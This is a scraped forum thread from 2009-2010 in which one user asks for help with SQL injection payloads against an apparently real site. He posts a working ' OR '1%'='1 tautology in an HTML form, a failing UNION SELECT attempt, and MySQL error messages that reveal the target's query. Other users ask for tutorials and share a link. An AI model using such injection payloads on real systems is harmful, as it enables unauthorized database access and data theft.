|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 94
Members: 0
Total: 94
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
SQL injection help.. |
|
Posted: Wed Dec 30, 2009 10:39 pm |
|
|
kr0k0 |
Advanced user |
|
|
Joined: Jan 26, 2008 |
Posts: 128 |
|
|
|
|
|
|
|
I have a problem and i just need help plz, look..
I just tried to inject those injections & some requests dont works..need solution plz
When i try this injection..it work perfectly true and false ...
(' OR '1%'='1 / ' OR '1%'='0 )
Code: | <form action="" method="POST">
<input type="hidden" name="keyword" value="AA' OR '1%'='1">
<input type="submit" value="Inject !">
</form> |
But when i just try an other injection for example like..
Code: | ' union select 1 AND '1%'='1 |
I got this :
Code: | Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near
'union select 1,1 AND '1%'='1%' OR AC.AC_prop_desc like '%AA' union select 1,1 AN' at line 1 |
or this injection :
I jus got this error...
Code: | Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*%' OR AC.AC_prop_desc like '%AA' AND 1=1/*%' OR AC.AC_solicitor like '%AA' AN' at line 1 |
Plz help me and thank's a lol in advanced ...sorry for my english ! |
|
|
|
|
|
|
FInd Tutor |
|
Posted: Fri Feb 12, 2010 2:17 am |
|
|
-AnaRchy-99- |
Beginner |
|
|
Joined: Feb 12, 2010 |
Posts: 3 |
Location: www.underground-zone.org |
|
|
|
|
|
|
Help where i can found about
step by step tutorial to be use SQL injection
what mus to do first please some one help
to give me link i need learn
thanks |
|
|
|
|
Posted: Fri Feb 12, 2010 12:22 pm |
|
|
vince213333 |
Advanced user |
|
|
Joined: Aug 03, 2009 |
Posts: 737 |
Location: Belgium |
|
|
|
|
|
|
Google might help you.
Code: | http://www.securiteam.com/securityreviews/5DP0N1P76E.html |
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|